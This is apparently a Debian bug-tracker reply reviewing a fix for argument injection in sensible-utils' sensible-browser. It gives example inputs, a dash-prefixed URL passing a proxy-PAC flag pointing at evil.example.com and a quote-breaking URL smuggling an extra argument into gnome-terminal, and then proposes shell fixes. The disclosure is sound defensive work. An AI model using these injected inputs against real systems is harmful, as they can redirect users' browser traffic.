Hi, > Source: sensible-utils > Source-Version: 0.0.11 > > We believe that the bug you reported is fixed in the latest version of > sensible-utils, which is due to be installed in the Debian FTP archive.
I can't find the source of the new version yet so I can't review it yet. I think we need to exclude URI starting with `-` or `--` as well. Otherwise an attacker might pass flags (such as --proxy-pac-url=http://evil.example.com/proxy.pac) with: BROWSER=chromium sensible-browser ----proxy-pac-url=http://evil.example.com/proxy.pac Seometing like: if ! echo -n "$URL" | head -n1 | grep '^[a-zA-Z][a-zA-Z0-9+\-.]*:' > /dev/null ; then exit 1 fi or: if ! echo -n "$URL" | grep -z '^[a-zA-Z][a-zA-Z0-9+\-.]*:' > /dev/null ; then exit 1 fi or: case "$1" in -*) exit 1 ;; *) true ;; esac By the way, this line is vulenable as well: exec /usr/bin/gnome-terminal -e "/usr/bin/www-browser ${URL:+\"$URL\"}" For example: URL='http://www.example.com/"; "--incognito' ; /usr/bin/gnome-terminal -e "chromium ${URL:+\"$URL\"}" A possible fix is to use: exec /usr/bin/gnome-terminal -- "/usr/bin/www-browser" ${URL:+"$URL"} Cheers, -- Gabriel
